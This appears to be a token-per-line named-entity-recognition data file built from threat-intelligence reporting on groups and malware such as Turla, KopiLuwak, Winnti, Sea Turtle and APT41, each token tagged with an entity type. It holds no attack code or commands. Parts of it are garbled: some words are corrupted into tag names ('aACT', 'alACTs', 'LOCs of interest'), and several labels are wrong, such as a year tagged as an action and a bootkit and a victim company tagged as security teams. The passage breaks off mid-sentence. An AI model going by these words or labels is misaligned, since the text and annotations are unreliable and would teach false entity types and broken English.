+Sheep’s O
+case O
+, O
+Shun B-APT
+Wang E-APT
+likely O
+harvests O
+end O
+user O
+contact O
+lists O
+without O
+application O
+developer O
+acknowledgement O
+. O
+According O
+to O
+Cheetah O
+Mobile’s O
+follow-up O
+investigation O
+, O
+fraudulent O
+behaviors O
+came O
+from O
+two O
+3rd O
+party O
+SDKs O
+Batmobi S-FILE
+, O
+Duapps S-FILE
+integrated O
+inside O
+Cheetah B-FILE
+SDK E-FILE
+. O
+It O
+is O
+likely O
+a O
+new O
+campaign O
+or O
+actor S-APT
+started O
+using O
+Panda B-MAL
+Banker E-MAL
+since O
+in O
+addition O
+to O
+the O
+previously O
+unseen O
+Japanese S-LOC
+targeting O
+, O
+Arbor S-SECTEAM
+has O
+not O
+seen O
+any O
+indicator O
+of O
+compromise O
+(IOC) O
+overlaps O
+with O
+previous O
+Panda B-FILE
+Banker E-FILE
+campaigns O
+. O
+Webinjects O
+targeting O
+Japan S-LOC
+, O
+a O
+country O
+we O
+haven’t O
+seen O
+targeted O
+by O
+Panda B-FILE
+Banker E-FILE
+before O
+. O
+Japan S-LOC
+is O
+no O
+stranger O
+to O
+banking S-FILE
+malware S-FILE
+. O
+Based O
+on O
+recent O
+reports O
+, O
+the O
+country S-LOC
+has O
+been O
+plagued O
+by O
+attacks O
+using O
+the O
+Ursnif S-FILE
+and O
+Urlzone S-FILE
+banking O
+malware O
+. O
+This O
+post O
+was O
+our O
+first O
+analysis O
+of O
+the O
+first O
+Panda B-FILE
+Banker E-FILE
+campaign O
+that O
+we’ve O
+seen O
+to O
+target O
+financial B-IDTY
+institutions E-IDTY
+in O
+Japan S-LOC
+. O
+Operation B-APT
+Pawn I-APT
+Storm E-APT
+is O
+an O
+active O
+economic S-IDTY
+and O
+political S-IDTY
+cyber-espionage O
+operation O
+that O
+targets O
+a O
+wide O
+range O
+of O
+entities O
+, O
+like O
+the O
+military S-IDTY
+, O
+governments S-IDTY
+, O
+defense B-IDTY
+industries E-IDTY
+, O
+and O
+the O
+media S-IDTY
+. O
+we O
+believe O
+the O
+iOS O
+malware O
+gets O
+installed O
+on O
+already O
+compromised O
+systems O
+, O
+and O
+it O
+is O
+very O
+similar O
+to O
+next O
+stage O
+SEDNIT S-FILE
+malware O
+we O
+have O
+found O
+for O
+Microsoft S-IDTY
+Windows’ O
+systems O
+. O
+we O
+found O
+two O
+malicious O
+iOS O
+applications O
+in O
+Operation O
+Pawn B-ACT
+Storm E-ACT
+. O
+One O
+is O
+called O
+XAgent S-FILE
+detected O
+as O
+IOS_XAGENT.A S-FILE
+and O
+the O
+other O
+one O
+uses O
+the O
+name O
+of O
+a O
+legitimate O
+iOS O
+game O
+, O
+MadCap S-FILE
+detected O
+as O
+IOS_ O
+XAGENT.B S-FILE
+. O
+The O
+obvious O
+goal O
+of O
+the O
+SEDNIT-related S-APT
+spyware O
+is O
+to O
+steal O
+personal B-IDTY
+data E-IDTY
+, O
+record O
+audio O
+, O
+make O
+screenshots O
+, O
+and O
+send O
+them O
+to O
+a O
+remote O
+command-and-control O
+(C&C) O
+server O
+. O
+
+To O
+learn O
+more O
+about O
+this O
+campaign O
+, O
+you O
+may O
+refer O
+to O
+our O
+report O
+, O
+Operation O
+Pawn B-ACT
+Storm E-ACT
+Using O
+Decoys O
+to O
+Evade B-APT
+Detection E-APT
+. O
+Additionally O
+, O
+we O
+discovered O
+a O
+new O
+DNS S-PROT
+hijacking O
+technique O
+that O
+we O
+assess O
+with O
+moderate O
+confidence O
+is O
+connected O
+to O
+the O
+actors S-APT
+behind O
+Sea B-ACT
+Turtle E-ACT
+. O
+Talos S-SECTEAM
+now O
+has O
+moderate O
+confidence O
+that O
+the O
+threat O
+actors O
+behind O
+Sea B-ACT
+Turtle E-ACT
+have O
+been O
+using O
+another O
+DNS S-PROT
+hijacking O
+technique O
+. O
+This O
+technique S-ACT
+was O
+also O
+observed O
+against O
+a O
+government O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+North B-LOC
+African E-LOC
+region O
+. O
+Cisco S-SECTEAM
+telemetry O
+confirmed O
+that O
+the O
+actors O
+behind O
+Sea B-ACT
+Turtle E-ACT
+maintained O
+access O
+to O
+the O
+ICS-Forth O
+network O
+from O
+an O
+operational O
+command O
+and O
+control B-MAL
+(C2) E-MAL
+node O
+. O
+Our O
+telemetry O
+indicates O
+that O
+the O
+actors S-APT
+maintained O
+access O
+in O
+the O
+ICS-Forth O
+network O
+through O
+at O
+least O
+April B-TIME
+24 E-TIME
+, O
+five O
+days O
+after O
+the O
+statement O
+was O
+publicly O
+released O
+. O
+This O
+full-blown O
+spying O
+framework O
+consists O
+of O
+two O
+packages O
+named O
+‘Tokyo’ S-FILE
+and O
+‘Yokohama’ S-FILE
+. O
+Just O
+to O
+highlight O
+its O
+capabilities O
+, O
+TajMahal S-FILE
+is O
+able O
+to O
+steal O
+data O
+from O
+a O
+CD O
+burnt O
+by O
+a O
+victim O
+as O
+well O
+as O
+from O
+the O
+printer O
+queue O
+. O
+The O
+first O
+confirmed O
+date O
+when O
+TajMahal S-FILE
+samples O
+were O
+seen O
+on O
+a O
+victim’s O
+machine O
+is O
+August S-TIME
+2014 S-TIME
+. O
+More O
+details O
+about O
+TajMahal S-FILE
+are O
+available O
+to O
+customers O
+of O
+the O
+Kaspersky S-SECTEAM
+Intelligence O
+Reporting O
+service O
+. O
+
+The O
+dropper S-ACT
+first O
+appeared O
+in O
+mid-July S-TIME
+, O
+suggesting O
+that O
+this O
+APT O
+activity O
+is O
+potentially O
+ongoing O
+, O
+with O
+Turla S-APT
+actively O
+targeting O
+G20 S-IDTY
+participants O
+and/or O
+those O
+with O
+interest O
+in O
+the O
+G20 O
+, O
+including O
+member O
+nations O
+, O
+journalists O
+, O
+and O
+policymakers O
+. O
+Turla S-APT
+is O
+a O
+well-documented O
+, O
+long O
+operating O
+APT O
+group O
+that O
+is O
+widely O
+believed O
+to O
+be O
+a O
+Russian S-LOC
+state-sponsored O
+organization O
+. O
+Turla S-APT
+is O
+perhaps O
+most O
+notoriously O
+suspected O
+as O
+responsible O
+for O
+the O
+breach O
+of O
+the O
+United O
+States O
+Central O
+Command O
+in O
+2008 S-ACT
+. O
+More O
+recently O
+Turla S-APT
+was O
+accused O
+of O
+breaching O
+RUAG S-IDTY
+, O
+a O
+Swiss O
+technology O
+company O
+, O
+in O
+a O
+public O
+report O
+published O
+by O
+GovCERT.ch S-SECTEAM
+. O
+The O
+delivery O
+of O
+KopiLuwak O
+in O
+this O
+instance O
+is O
+currently O
+unknown O
+as O
+the O
+MSIL B-FILE
+dropper E-FILE
+has O
+only O
+been O
+observed O
+by O
+Proofpoint S-SECTEAM
+researchers O
+on O
+a O
+public O
+malware O
+repository O
+. O
+Assuming O
+this O
+variant O
+of O
+KopiLuwak O
+has O
+been O
+observed O
+in O
+the O
+wild O
+, O
+there O
+are O
+a O
+number O
+of O
+ACTs O
+it O
+may O
+have O
+been O
+delivered O
+including O
+some O
+of O
+Turla’s S-APT
+previous O
+attack O
+methods O
+such O
+as O
+spear B-ACT
+phishing E-ACT
+or O
+via O
+a O
+watering B-ACT
+hole E-ACT
+. O
+This O
+could O
+include O
+diplomats S-IDTY
+, O
+experts O
+in O
+the O
+LOCs O
+of O
+interest O
+related O
+to O
+the O
+Digital O
+Economy O
+Task O
+Force O
+, O
+or O
+possibly O
+even O
+journalists S-IDTY
+. O
+Turla's S-APT
+goal O
+could O
+include O
+diplomats O
+, O
+experts O
+in O
+the O
+LOCs O
+of O
+interest O
+related O
+to O
+the O
+Digital B-IDTY
+Economy E-IDTY
+Task O
+Force O
+, O
+or O
+possibly O
+even O
+journalists O
+. O
+The O
+earliest O
+step O
+in O
+any O
+possible O
+attack(s) O
+involving O
+this O
+variant O
+of O
+KopiLuwak S-FILE
+of O
+which O
+Proofpoint O
+researchers O
+are O
+currently O
+aware O
+begin O
+with O
+the O
+MSIL B-FILE
+dropper E-FILE
+. O
+The O
+basic O
+chain O
+of O
+events O
+upon O
+execution O
+of O
+the O
+MSIL B-FILE
+dropper E-FILE
+include O
+dropping O
+and O
+executing O
+both O
+a O
+PDF S-TOOL
+decoy O
+and O
+a O
+Javascript B-FILE
+(JS) I-FILE
+dropper E-FILE
+. O
+As O
+explained O
+in O
+further O
+detail O
+below O
+, O
+the O
+JS B-FILE
+dropper E-FILE
+ultimately O
+installs O
+a O
+JS B-FILE
+decryptor E-FILE
+onto O
+an O
+infected O
+machine O
+that O
+will O
+then O
+finally O
+decrypt O
+and O
+execute O
+the O
+actual O
+KopiLuwak S-FILE
+backdoor O
+in O
+memory O
+only O
+. O
+As O
+Proofpoint S-SECTEAM
+has O
+not O
+yet O
+observed O
+this O
+attack O
+in O
+the O
+wild O
+it O
+is O
+likely O
+that O
+there O
+is O
+an O
+additional O
+component O
+that O
+leads O
+to O
+the O
+execution O
+of O
+the O
+MSIL B-FILE
+payload E-FILE
+. O
+The O
+newer O
+variant O
+of O
+KopiLuwak S-FILE
+is O
+now O
+capable O
+of O
+exfiltrating O
+files O
+to O
+the O
+C&C S-TOOL
+as O
+well O
+as O
+downloading O
+files O
+and O
+saving O
+them O
+to O
+the O
+infected O
+machine O
+. O
+Despite O
+the O
+added O
+capabilities O
+, O
+we O
+still O
+agree O
+with O
+Kaspersky S-SECTEAM
+that O
+this O
+backdoor O
+is O
+likely O
+used O
+as O
+an O
+initial O
+reconnaissance O
+tool O
+and O
+would O
+probably O
+be O
+used O
+as O
+a O
+staging O
+point O
+to O
+deploy O
+one O
+of O
+Turla’s S-APT
+more O
+fully O
+featured O
+implants O
+. O
+Turla S-APT
+is O
+a O
+complex O
+cyberattack O
+platform O
+focused O
+predominantly O
+on O
+diplomatic O
+and O
+government-related O
+targets O
+, O
+particularly O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+Central S-LOC
+and O
+Far B-LOC
+East I-LOC
+Asia E-LOC
+, O
+Europe S-LOC
+, O
+North B-LOC
+and I-LOC
+South I-LOC
+America E-LOC
+and O
+former B-LOC
+Soviet E-LOC
+bloc O
+nations O
+. O
+We O
+didn’t O
+choose O
+to O
+name O
+it O
+after O
+a O
+vegetable; O
+the O
+.NET B-FILE
+malware E-FILE
+developers O
+named O
+it O
+Topinambour S-FILE
+themselves O
+. O
+The O
+role O
+of O
+the O
+.NET B-FILE
+module E-FILE
+is O
+to O
+deliver O
+the O
+known O
+KopiLuwak B-FILE
+JavaScript E-FILE
+Trojan S-MAL
+. O
+Moreover O
+, O
+Turla S-APT
+now O
+also O
+has O
+a O
+heavily O
+obfuscated O
+PowerShell B-ACT
+Trojan E-ACT
+that O
+is O
+similar O
+to O
+KopiLuwak O
+. O
+
+These O
+campaign-related O
+VPSs S-TOOL
+are O
+located O
+in O
+South S-LOC
+Africa S-LOC
+. O
+
+The O
+tool O
+does O
+all O
+that O
+a O
+typical O
+Trojan S-FILE
+needs O
+to O
+accomplish: O
+upload O
+, O
+download O
+and O
+execute O
+files O
+, O
+fingerprint O
+target O
+systems O
+. O
+
+The O
+PowerShell S-TOOL
+version O
+of O
+the O
+Trojan S-MAL
+also O
+has O
+the O
+ability O
+to O
+get O
+screenshots O
+. O
+
+The O
+Trojan S-MAL
+is O
+quite O
+similar O
+to O
+the O
+.NET S-TOOL
+RocketMan S-MAL
+Trojan S-MAL
+Obviously O
+and O
+can O
+handle O
+the O
+same O
+commands; O
+additionally O
+, O
+it O
+includes O
+the O
+#screen” O
+command O
+to O
+take O
+a O
+screenshot O
+. O
+
+The O
+usage O
+of O
+KopiLuwak S-MAL
+, O
+a O
+well-known O
+and O
+exclusive O
+artefact O
+previously O
+used O
+by O
+the O
+Turla S-APT
+group O
+, O
+makes O
+us O
+attribute O
+this O
+campaign O
+to O
+this O
+actor O
+with O
+high O
+confidence O
+. O
+
+Winnti S-APT
+mode O
+of O
+operation O
+to O
+collect O
+information O
+on O
+the O
+organizational O
+charts B-IDTY
+of I-IDTY
+companies E-IDTY
+, O
+on O
+cooperating O
+departments O
+, O
+on O
+the O
+IT O
+systems O
+of O
+individual B-IDTY
+business I-IDTY
+units E-IDTY
+, O
+and O
+on O
+trade O
+secrets O
+, O
+obviously O
+. O
+Hackers S-APT
+usually O
+take O
+precautions O
+, O
+which O
+experts O
+refer O
+to O
+as O
+Opsec S-ACT
+. O
+
+The O
+Winnti S-APT
+group’s O
+Opsec S-ACT
+was O
+dismal O
+to O
+say O
+the O
+least O
+. O
+This O
+mode O
+of O
+operation O
+is O
+typical O
+of O
+many O
+hacker S-APT
+groups—and O
+especially O
+of O
+Winnti S-APT
+. O
+
+They O
+are O
+a O
+very O
+, O
+very O
+persistent O
+group O
+, O
+” O
+says O
+Costin B-SECTEAM
+Raiu E-SECTEAM
+, O
+who O
+has O
+been O
+watching O
+Winnti S-APT
+since O
+2011 S-TIME
+. O
+
+Raiu S-SECTEAM
+and O
+his O
+team O
+have O
+followed O
+the O
+digital O
+tracks O
+left O
+behind O
+by O
+some O
+of O
+the O
+Winnti S-APT
+hackers O
+. O
+
+One O
+government O
+official O
+puts O
+it O
+very O
+matter-of-factly: O
+Winnti S-APT
+is O
+very O
+specific O
+to O
+Germany S-LOC
+. O
+
+By O
+2014 S-TIME
+, O
+the O
+Winnti S-APT
+malware O
+code O
+was O
+no O
+longer O
+limited O
+to O
+game B-IDTY
+manufacturers E-IDTY
+. O
+Winnti S-APT
+is O
+targeting O
+high-tech B-IDTY
+companies E-IDTY
+as O
+well O
+as O
+chemical O
+and O
+pharmaceutical B-IDTY
+companies E-IDTY
+. O
+Winnti S-APT
+is O
+attacking O
+companies O
+in O
+Japan S-LOC
+, O
+France S-LOC
+, O
+the B-LOC
+U.S. E-LOC
+and O
+Germany S-LOC
+. O
+The O
+Winnti S-APT
+hackers O
+broke O
+into O
+Henkel’s S-IDTY
+network O
+in O
+2014 S-TIME
+. O
+Henkel S-SECTEAM
+confirms O
+the O
+Winnti S-APT
+incident O
+and O
+issues O
+the O
+following O
+statement: O
+The O
+cyberattack O
+was O
+discovered O
+in O
+the O
+summer O
+of O
+2014 O
+and O
+Henkel O
+promptly O
+took O
+all O
+necessary O
+precautions O
+. O
+Far O
+from O
+attacking O
+Henkel S-IDTY
+and O
+the O
+other O
+companies O
+arbitrarily O
+, O
+Winnti S-APT
+takes O
+a O
+highly O
+strategic O
+approach O
+. O
+The O
+hackers O
+behind O
+Winnti S-MAL
+have O
+also O
+set O
+their O
+sights O
+on O
+Japan’s S-LOC
+biggest O
+chemical B-IDTY
+company E-IDTY
+, O
+Shin-Etsu B-IDTY
+Chemical E-IDTY
+. O
+In O
+the O
+case O
+of O
+another O
+Japanese O
+company O
+, O
+Sumitomo B-IDTY
+Electric E-IDTY
+, O
+Winnti S-APT
+apparently O
+penetrated O
+their O
+networks O
+during O
+the O
+summer B-TIME
+of I-TIME
+2016 E-TIME
+. O
+Winnti S-APT
+hackers O
+also O
+penetrated O
+the O
+BASF S-IDTY
+and O
+Siemens S-IDTY
+networks S-IDTY
+. O
+Thanks O
+to O
+this O
+tool O
+, O
+we O
+found O
+out O
+back O
+in O
+March B-TIME
+2019 E-TIME
+that O
+the O
+Bayer B-IDTY
+pharmaceutical E-IDTY
+group O
+had O
+been O
+hacked O
+by O
+Winnti S-APT
+. O
+At O
+Gameforge S-IDTY
+, O
+the O
+Winnti S-APT
+hackers O
+had O
+already O
+been O
+removed O
+from O
+the O
+networks O
+when O
+a O
+staff O
+member O
+noticed O
+a O
+Windows S-OS
+start O
+screen O
+with O
+Chinese O
+characters O
+. O
+To O
+witnesses O
+, O
+the O
+spy S-APT
+appears O
+to O
+be O
+running O
+a O
+program O
+showing O
+videos O
+, O
+presenting B-MAL
+slides E-MAL
+( O
+Prezi S-MAL
+) O
+, O
+playing O
+a O
+computer O
+game O
+or O
+even O
+running O
+a O
+fake O
+virus O
+scanner O
+. O
+
+From O
+the O
+time O
+of O
+file O
+creation O
+, O
+the O
+attacker S-APT
+started O
+working O
+at O
+least O
+as O
+early O
+as O
+July B-TIME
+2018 E-TIME
+. O
+The O
+link O
+to O
+feeds.rapidfeeds.com O
+left O
+in O
+its O
+XML S-TOOL
+configuration O
+file O
+was O
+also O
+mentioned O
+by O
+Kaspersky’s S-SECTEAM
+report O
+in O
+the O
+reference O
+section O
+, O
+which O
+confirms O
+that O
+the O
+APT-C-09 S-APT
+group O
+keeps O
+updating O
+its O
+C2 S-TOOL
+configuration O
+channel O
+and O
+the O
+recent O
+one O
+reserves O
+some O
+past O
+features O
+. O
+For O
+example O
+, O
+Donot S-APT
+and O
+Bitter S-APT
+disguised O
+as O
+Kashmiri O
+Voice O
+to O
+attack O
+Pakistan S-LOC
+, O
+Transparent O
+Tribe O
+attacked O
+India S-LOC
+with O
+decoy O
+document O
+regarding O
+terrorist O
+attacks O
+in O
+Kashmir O
+. O
+Considering O
+APT-C-09 S-APT
+, O
+Bitter S-APT
+and O
+Donot S-APT
+have O
+carried O
+out O
+targeted O
+attacks O
+against O
+China S-LOC
+, O
+we O
+must O
+take O
+actions O
+in O
+advance O
+and O
+keep O
+a O
+close O
+eye O
+on O
+their O
+recent O
+activities O
+. O
+APT41 S-APT
+espionage O
+operations O
+against O
+the O
+healthcare S-IDTY
+, O
+high-tech S-IDTY
+, O
+and O
+telecommunications B-IDTY
+sectors E-IDTY
+include O
+establishing O
+and O
+maintaining O
+strategic O
+access O
+, O
+and O
+through O
+mid-2015 S-TIME
+, O
+the O
+theft S-ACT
+of O
+intellectual O
+property O
+. O
+FireEye S-SECTEAM
+Threat O
+Intelligence O
+assesses O
+with O
+high O
+confidence O
+that O
+APT41 S-APT
+carries O
+out O
+an O
+array O
+of O
+financially B-ACT
+motivated I-ACT
+intrusions E-ACT
+, O
+particularly O
+against O
+the O
+video B-IDTY
+game I-IDTY
+industry E-IDTY
+, O
+including O
+stealing B-ACT
+source I-ACT
+code E-ACT
+and O
+digital B-ACT
+certificates E-ACT
+, O
+virtual B-ACT
+currency I-ACT
+manipulation E-ACT
+, O
+and O
+attempting O
+to O
+deploy B-ACT
+ransomware E-ACT
+. O
+APT41 S-APT
+has O
+executed B-ACT
+multiple I-ACT
+software E-ACT
+supply O
+chain O
+compromises O
+, O
+gaining O
+access O
+to O
+software O
+companies O
+to O
+inject O
+malicious O
+code O
+into O
+legitimate O
+files O
+before O
+distributing O
+updates O
+. O
+APT41 S-APT
+is O
+unique O
+among O
+tracked O
+China-based S-LOC
+actors O
+in O
+that O
+it O
+leverages B-ACT
+non-public I-ACT
+malware E-ACT
+typically O
+reserved O
+for O
+espionage O
+operations O
+in O
+what O
+appears O
+to O
+be O
+activity O
+that O
+falls O
+outside O
+the O
+scope O
+of O
+state-sponsored O
+missions O
+. O
+Based O
+on O
+early O
+observed O
+activity O
+, O
+consistent O
+behavior O
+, O
+and O
+APT41's S-APT
+unusual O
+focus O
+on O
+the O
+video B-IDTY
+game I-IDTY
+industry E-IDTY
+, O
+we O
+believe O
+the O
+group's O
+cyber O
+crime O
+activities O
+are O
+most O
+likely O
+motivated O
+by O
+personal O
+financial O
+gain O
+or O
+hobbyist O
+interests O
+. O
+APT41 S-APT
+campaigns O
+include O
+most O
+of O
+the O
+incidents O
+previously O
+attributed O
+in O
+FireEye S-SECTEAM
+Threat O
+Intelligence O
+reporting O
+to O
+GREF O
+Team O
+and O
+a O
+number O
+of O
+additional O
+clusters O
+that O
+were O
+previously O
+unnamed O
+. O
+Activity O
+traces O
+back O
+to O
+2012 S-TIME
+when O
+individual O
+members O
+of O
+APT41 S-APT
+conducted O
+primarily O
+financially O
+motivated O
+operations O
+focused O
+on O
+the O
+video O
+game O
+industry O
+before O
+expanding O
+into O
+likely O
+statesponsored O
+activity O
+. O
+Learning O
+to O
+access O
+video O
+game O
+production O
+environments O
+enabled O
+APT41 S-APT
+to O
+develop O
+the O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+(TTPs) O
+that O
+were O
+later O
+leveraged O
+against O
+software O
+companies O
+to O
+inject O
+malicious O
+code O
+into O
+software O
+updates O
+. O
+APT41 S-APT
+has O
+targeted O
+organizations O
+in O
+14 O
+countries O
+over O
+seven O
+years O
+, O
+including: O
+France S-LOC
+, O
+India S-LOC
+, O
+Italy S-LOC
+, O
+Japan S-LOC
+, O
+Myanmar S-LOC
+, O
+the B-LOC
+Netherlands E-LOC
+, O
+Singapore S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+South B-LOC
+Africa E-LOC
+, O
+Switzerland S-LOC
+, O
+Thailand S-LOC
+, O
+Turkey S-LOC
+, O
+the B-LOC
+United I-LOC
+Kingdom E-LOC
+, O
+and O
+the B-LOC
+United I-LOC
+States E-LOC
+(Figure O
+1) O
+. O
+APT41 S-APT
+espionage O
+operations O
+against O
+entities S-IDTY
+in O
+these O
+countries O
+follow O
+targeting O
+of O
+verticals O
+consistent O
+with O
+Chinese O
+national O
+policy O
+priorities O
+. O
+We O
+believe O
+that O
+like O
+other O
+Chinese O
+espionage O
+operators O
+, O
+APT41 S-APT
+has O
+moved O
+toward O
+strategic O
+intelligence O
+collection O
+and O
+establishing O
+access O
+, O
+but O
+aACT O
+from O
+direct O
+intellectual O
+property O
+theft O
+. O
+In O
+2014 S-TIME
+, O
+APT41 S-APT
+was O
+observed O
+carrying O
+out O
+espionage O
+campaigns O
+concurrently O
+with O
+financially O
+motivated O
+intrusions O
+, O
+demonstrating O
+that O
+they O
+could O
+balance O
+different O
+objectives O
+simultaneously O
+. O
+Since O
+2017 S-TIME
+, O
+APT41's S-APT
+activities O
+have O
+included O
+a O
+series O
+of O
+supply B-ACT
+chain I-ACT
+compromises E-ACT
+. O
+The O
+group O
+also O
+targeted O
+companies O
+involved O
+in O
+producing B-IDTY
+motherboards E-IDTY
+, O
+processors S-IDTY
+, O
+and O
+server B-IDTY
+solutions E-IDTY
+for O
+enterprises O
+. O
+Since O
+2013 S-TIME
+, O
+APT41 S-APT
+has O
+targeted O
+organizations S-IDTY
+involved O
+in O
+the O
+research O
+, O
+development O
+, O
+and O
+sale O
+of O
+computer O
+components O
+used O
+for O
+machine-learning S-IDTY
+, O
+autonomous B-IDTY
+vehicles E-IDTY
+, O
+medical B-IDTY
+imaging E-IDTY
+, O
+and O
+the O
+consumer B-IDTY
+market E-IDTY
+. O
+In O
+a O
+2014 S-TIME
+compromise O
+, O
+APT41 S-APT
+targeted O
+a O
+European B-IDTY
+conglomerate E-IDTY
+and O
+specifically O
+focused O
+on O
+systems O
+physically O
+located O
+in O
+China S-LOC
+. O
+In O
+spring B-TIME
+2015 E-TIME
+, O
+APT41 S-APT
+targeted O
+information O
+related O
+to O
+two O
+entities O
+undergoing O
+a O
+merger O
+announced O
+the O
+previous O
+year O
+. O
+Since O
+2017 S-TIME
+, O
+APT41 S-APT
+has O
+consistently O
+targeted O
+telecommunications B-IDTY
+companies E-IDTY
+, O
+possibly O
+a O
+crucial O
+first O
+step O
+to O
+establish O
+a O
+foothold O
+in O
+targeting O
+a O
+particular O
+region O
+. O
+Targeted O
+telecom B-IDTY
+companies E-IDTY
+spanned O
+several O
+countries O
+, O
+and O
+recently O
+identified O
+intrusions O
+were O
+concentrated O
+in O
+countries O
+where O
+we O
+had O
+not O
+identified O
+any O
+prior O
+APT41 S-APT
+activity O
+. O
+In O
+July O
+and O
+August B-TIME
+2016 E-TIME
+, O
+APT41 S-APT
+sent O
+spear-phishing S-ACT
+emails S-TOOL
+to O
+Hong B-IDTY
+Kong I-IDTY
+media E-IDTY
+organizations O
+known O
+for O
+pro-democracy O
+editorial O
+content O
+. O
+This O
+was O
+the O
+first O
+instance O
+we O
+have O
+observed O
+of O
+APT41 S-APT
+targeting O
+pro-democracy S-IDTY
+groups O
+in O
+Hong S-LOC
+Kong S-LOC
+. O
+APT41 S-APT
+frequently O
+leverages O
+timely O
+news O
+stories O
+as O
+the O
+lure O
+content O
+in O
+their O
+spear-phishing S-ACT
+emails S-TOOL
+, O
+although O
+social O
+engineering O
+content O
+does O
+not O
+alACTs O
+correlate O
+with O
+targeted O
+users O
+or O
+organizations O
+. O
+In O
+2015 S-TIME
+, O
+APT41 S-APT
+targeted O
+a O
+Japanese B-IDTY
+media I-IDTY
+organization E-IDTY
+with O
+a O
+lure O
+document O
+(Figure O
+3) O
+titled O
+中東呼吸器症候 O
+群(MERS)の予防 O
+, O
+” O
+which O
+translates O
+to O
+Prevention O
+of O
+Middle B-LOC
+East E-LOC
+Respiratory O
+Syndrome O
+(MERS) O
+. O
+APT41 S-APT
+activity O
+aimed O
+at O
+medical B-IDTY
+device I-IDTY
+companies E-IDTY
+and O
+pharmaceuticals O
+is O
+demonstrative O
+of O
+the O
+group's O
+capacity O
+to O
+collect O
+sensitive O
+and O
+highly O
+valuable O
+intellectual O
+property O
+(IP) O
+, O
+although O
+we O
+have O
+not O
+observed O
+evidence O
+of O
+IP S-PROT
+theft O
+since O
+late O
+2015 S-TIME
+. O
+Unlike O
+other O
+observed O
+Chinese O
+espionage O
+operators O
+, O
+APT41 S-APT
+conducts O
+explicit O
+financially S-IDTY
+motivated O
+activity O
+, O
+which O
+has O
+included O
+the O
+use O
+of O
+tools O
+that O
+are O
+otherwise O
+exclusively O
+used O
+in O
+campaigns O
+supporting O
+state O
+interests O
+. O
+Although O
+APT41 S-APT
+initially O
+targeted O
+the O
+parent B-IDTY
+company E-IDTY
+, O
+30 O
+percent O
+of O
+the O
+victimized O
+hosts O
+were O
+related O
+to O
+a O
+subsidiary O
+specialized O
+in O
+manufacturing O
+medical O
+devices O
+. O
+In O
+2018 S-TIME
+, O
+we O
+observed O
+APT41 S-APT
+target O
+a O
+third B-IDTY
+healthcare E-IDTY
+company O
+, O
+although O
+their O
+goals O
+during O
+this O
+compromise O
+were O
+unclear O
+. O
+In O
+June B-TIME
+2018 E-TIME
+, O
+APT41 S-APT
+sent O
+spear-phishing S-ACT
+emails S-TOOL
+using O
+an O
+invitation O
+lure O
+to O
+join O
+a O
+decentralized O
+gaming O
+platform O
+linked O
+to O
+a O
+cryptocurrency O
+service O
+(Figure O
+5) O
+that O
+had O
+positioned O
+itself O
+as O
+a O
+medium O
+of O
+exchange O
+for O
+online O
+games O
+and O
+gambling O
+sites O
+. O
+This O
+provides O
+another O
+connection O
+between O
+the O
+targeting O
+of O
+the O
+cryptocurrency B-IDTY
+organizations E-IDTY
+and O
+video B-IDTY
+game I-IDTY
+targeting E-IDTY
+. O
+In O
+October B-TIME
+2018 E-TIME
+, O
+the O
+group O
+compiled O
+an O
+instance O
+of O
+XMRig S-MAL
+, O
+a O
+Monero O
+cryptocurrency O
+mining O
+tool O
+, O
+demonstrating O
+a O
+continued O
+interest O
+in O
+cryptocurrency O
+. O
+APT41 S-APT
+campaigns O
+focused O
+on O
+the O
+video B-IDTY
+game I-IDTY
+sector E-IDTY
+have O
+largely O
+affected O
+studios O
+and O
+distributors O
+in O
+East O
+and O
+Southeast O
+Asia O
+, O
+although O
+global B-IDTY
+companies E-IDTY
+based O
+in O
+the B-LOC
+United I-LOC
+States E-LOC
+have O
+also O
+been O
+targeted O
+. O
+APT41 S-APT
+continuously O
+returns O
+to O
+targeting O
+the O
+video B-IDTY
+game I-IDTY
+sector E-IDTY
+and O
+seems O
+to O
+have O
+matured O
+its O
+campaigns O
+through O
+lessons O
+learned O
+in O
+operations O
+against O
+the O
+industry O
+. O
+We O
+believe O
+these O
+operations O
+include O
+broadly O
+malicious B-ACT
+activity E-ACT
+that O
+can O
+enable O
+further O
+operations O
+, O
+such O
+as O
+targeting O
+game B-MAL
+source I-MAL
+code E-MAL
+and O
+compromising O
+digital B-MAL
+certificates E-MAL
+, O
+while O
+other O
+activities O
+are O
+explicitly O
+financially O
+motivated O
+, O
+such O
+as O
+abusing O
+in-game O
+currency O
+mechanics O
+. O
+In O
+October B-TIME
+2012 E-TIME
+, O
+APT41 S-APT
+used O
+captured O
+credentials O
+to O
+compromise O
+a O
+jump O
+server O
+and O
+access O
+a O
+production O
+environment O
+where O
+they O
+deployed O
+a O
+Linux S-OS
+version O
+of O
+PHOTO O
+. O
+Since O
+at O
+least O
+2012 S-TIME
+, O
+APT41 S-APT
+has O
+repeatedly O
+gained O
+access O
+to O
+game O
+development O
+environments O
+within O
+affected O
+companies O
+, O
+including O
+online B-IDTY
+multiplayer I-IDTY
+networks E-IDTY
+, O
+as O
+well O
+as O
+targeting O
+of O
+production O
+database O
+administrators S-IDTY
+. O
+APT41 S-APT
+has O
+been O
+observed O
+inserting B-ACT
+malicious I-ACT
+code E-ACT
+into O
+legitimate O
+video O
+game O
+files O
+to O
+distribute O
+malware O
+. O
+In O
+2018 S-TIME
+, O
+the O
+group O
+inserted B-ACT
+CRACKSHOT I-ACT
+malware E-ACT
+into O
+game O
+files O
+that O
+were O
+signed O
+with O
+legitimate O
+codesigning O
+certificates O
+, O
+most O
+likely O
+indicating O
+access O
+to O
+the O
+production O
+environment O
+, O
+which O
+facilitated O
+a O
+supply O
+chain O
+compromise O
+. O
+We O
+have O
+also O
+observed O
+APT41 S-APT
+limitedly O
+deploy O
+rootkits S-ACT
+on O
+Linux S-OS
+systems O
+and O
+Master B-TOOL
+Boot I-TOOL
+Record E-TOOL
+(MBR) S-TOOL
+bootkits O
+, O
+such O
+as O
+ROCKBOOT S-MAL
+, O
+on O
+Windows S-OS
+systems O
+to O
+hide O
+their O
+malware O
+and O
+maintain O
+persistence O
+on O
+victim O
+systems O
+. O
+Selective O
+deployment O
+of O
+ROCKBOOT S-SECTEAM
+suggests O
+that O
+APT41 S-APT
+reserves O
+more O
+advanced O
+TTPs O
+and O
+malware O
+only O
+for O
+high-value O
+targets O
+. O
+APT41 S-APT
+has O
+blatantly O
+engaged O
+in O
+financially O
+motivated O
+activity O
+targeting O
+the O
